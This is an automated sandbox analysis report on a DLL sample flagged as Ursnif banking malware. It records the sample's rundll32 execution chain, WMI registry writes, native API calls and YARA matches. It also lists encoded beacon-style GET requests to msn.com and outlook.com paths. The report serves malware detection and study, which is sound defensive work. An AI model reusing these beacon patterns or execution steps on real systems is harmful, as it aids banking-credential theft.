                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 42a9a6e9-6dd8-e4f4-89ca-fa996edc4ee9Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedFETarget: AM0PR03CU001.internal.outlook.comX-BackEndHttpStatus: 404X-FEProxyInfo: AM0PR03CA0028.EURPRD03.PROD.OUTLOOK.COMX-CalculatedBETarget: AM0P195MB0754.EURP195.PROD.OUTLOOK.COMX-BackEndHttpStatus: 404X-RUM-Validated: 1X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: 6aapQtht9OSJyvqZbtxO6Q.1.1X-FEServer: AM0PR03CA0028X-Powered-By: ASP.NETX-FEServer: AM6P195CA0091Date: Mon, 11 Oct 2021 20:51:06 GMTConnection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 1245Content-Type: text/htmlServer: Microsoft-IIS/10.0request-id: 6a56c307-e9c6-c4f1-93bd-eb8372a66b3cStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-CalculatedBETarget: AM5PR0202MB2546.eurprd02.prod.outlook.comX-BackEndHttpStatus: 404X-Proxy-RoutingCorrectness: 1X-Proxy-BackendServerStatus: 404MS-CV: B8NWasbp8cSTveuDcqZrPA.1X-Powered-By: ASP.NETX-FEServer: AM5PR0201CA0014Date: Mon, 11 Oct 2021 20:51:07 GMTConnection: close
                      Source: WerFault.exe, 00000012.00000002.526349700.0000000005348000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.524969424.0000000004A35000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.542519805.0000000004C13000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns#
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                      Source: loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.co
                      Source: loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmpString found in binary or memory: https://blogs.msn.com/
                      Source: loaddll32.exe, 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=13&checkda=1&ct=1633985424&rver
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&market=en-us"
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/en-us//api/modules/cdnfetch"
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/en-us/homepage/_sc/css/d7cb56b9-3a82770e/direct
                      Source: WerFault.exe, 00000013.00000002.531558276.0000000004A0C000.00000004.00000001.sdmpString found in binary or memory: https://watson.telemetry.microsoftv
                      Source: loaddll32.exe, 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.d
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a
                      Source: rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fRSTOkJCBHcQTlX372kVU%2fXbET532Uukq3yxPfegA%2frK8jg_2
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/?refurl=%2fmail%2fliopolo%2fjXTvRU37X%2fkKAN62uBd3tDT4UuvXf7%2ftv2pa650q_2BNc4gZ
                      Source: loaddll32.exe, 00000000.00000003.496097051.0000000002CA9000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.496583081.00000000051C9000.00000004.00000040.sdmpString found in binary or memory: https://www.msn.com/en-us//api/modules/fetch"
                      Source: unknownDNS traffic detected: queries for: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/jXTvRU37X/kKAN62uBd3tDT4UuvXf7/tv2pa650q_2BNc4gZx_/2FTXeKH3GDyDqufzZakfvK/_2BCNXallooq7/VODMkmNF/HLhLq8MOKcwivUMMxMgvZ_2/B7axPbB70w/pddJMbRWIrbrOmIG5/zCZ5Ye6AaaIK/UQVqKS3a0Xc/NIt9Fj3Ntaxoz6/O7VgyMdHSYlq2/ziEYeDY9/K.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0CX9Wer/Pdr_2B7wmmBlB9z54/C5o_2FVpVxdX/zwUkSFPzqLE/G68Q5qKTPDw9R0/3k18HoGgP18MPojxTL8vR/X_2F9xUEGn4YQSaZ/MXqGe2rtZBd9NJapOc3QD/8.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.office365.com
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49765 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.5:49766 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.152.242:443 -> 192.168.2.5:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.137.242:443 -> 192.168.2.5:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.161.50:443 -> 192.168.2.5:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.98.208.66:443 -> 192.168.2.5:49789 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.9.178:443 -> 192.168.2.5:49790 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3708, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5172, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.750000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.3.rundll32.exe.b0a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.71a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.c5a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.12fa31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.25c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.342a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6ece0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 6yDD19jMIu.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE21B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00754C40
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075664C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00752B76
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075954A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075AF24
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00757DEC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECF5600
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED2B597
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED3A2B1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ED1E8C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012BAF24
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012B2B76
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012B4C40
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ECF5600
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED2D630
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED43CCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED2B597
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED3A2B1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ED1E8C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6ED1ABD1 appears 91 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6ED1ABD1 appears 91 times
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE15C6 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE1273 NtMapViewOfSection,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE13B8 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6ECE23D5 NtQueryVirtualMemory,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00755D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0075B149 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012B5D10 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_012BB149 NtQueryVirtualMemory,
                      Source: 6yDD19jMIu.dllVirustotal: Detection: 9%
                      Source: 6yDD19jMIu.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872
